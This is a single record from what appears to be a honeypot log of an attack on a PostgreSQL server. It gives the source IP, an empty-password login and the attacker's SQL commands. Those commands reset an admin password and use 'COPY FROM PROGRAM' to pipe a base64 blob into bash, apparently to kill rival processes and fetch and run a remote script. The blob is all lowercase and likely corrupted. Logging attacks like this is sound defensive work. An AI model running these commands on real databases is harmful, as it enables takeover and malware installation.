Attack 942354f0-d809-4c94-9ed2-d9892bf29dd1
Details
| ID | 942354f0-d809-4c94-9ed2-d9892bf29dd1 |
| Attack Type | postgres |
| IP Address | 209.15.110.13 |
| Username | postgres |
| Password | empty |
| Client Version | |
| Country | United States |
| Date | 2024-10-24 03:03PM |
Commands
select * from pg_catalog.pg_user where usename='pgg_superadmins'; alter user pgg_superadmins with password '1038b63606c6e36b03796f7fecb06a7c'; drop table if exists rxzkwmam;create table rxzkwmam(cmd_output text);copy rxzkwmam from program 'echo iyevymlul2jhc2gkcgtpbgwglwygenn2ywpwa2lsbcatzibwzgvmzw5kzxjkcnbrawxsic1mihvwzgf0zwnozwnrzxjkcgpmdw5jdglvbibfx2n1cmwoksb7ciagcmvhzcbwcm90bybzzxj2zxigcgf0aca8pdwkkgvjag8gjhsxly8vlyb9kqogierpqz0vjhtwyxroly8gly99ciagse9tvd0ke3nlcnzlci8voip9ciague9svd0ke3nlcnzlci8vkjp9ciagw1sgecike0hpu1r9iia9psb4iir7ue9svh0iif1dicymifbpulq9odakciagzxhlyyazpd4vzgv2l3rjcc8ke0hpu1r9lyrqt1juciagzwnobyatzw4gikdfvcake0rpq30gsfruuc8xljbcclxusg9zddogjhtit1nufvxyxg5cclxuiia+jjmkicaod2hpbgugcmvhzcbsaw5loybkbwogicbbwyaijgxpbmuiid09icqnxhinif1dicymigjyzwfrciagzg9uzsamjibjyxqpidwmmwogigv4zwmgmz4mlqp9cgppzibbic14icikkgnvbw1hbmqglxygy3vybckiif07ihrozw4kicbjdxjsidgwljcxlje1oc40ms9wzy5zahxiyxnocmvsawygwyatecaijchjb21tyw5kic12ihdnzxqpiibdoyb0agvuciagd2dldcatcsatty0godaunzeumtu4ljqxl3bnlnnofgjhc2gkzwxzzqogif9fy3vybcbodhrwoi8vodaunzeumtu4ljqxl3bnmi5zahxiyxnocmzp|base64 -d|bash';select * from rxzkwmam;drop table if exists rxzkwmam; revoke pg_execute_server_program from postgres;
Proxy Requests
| IP Address | User / Pass | Date | Headers | URL |
|---|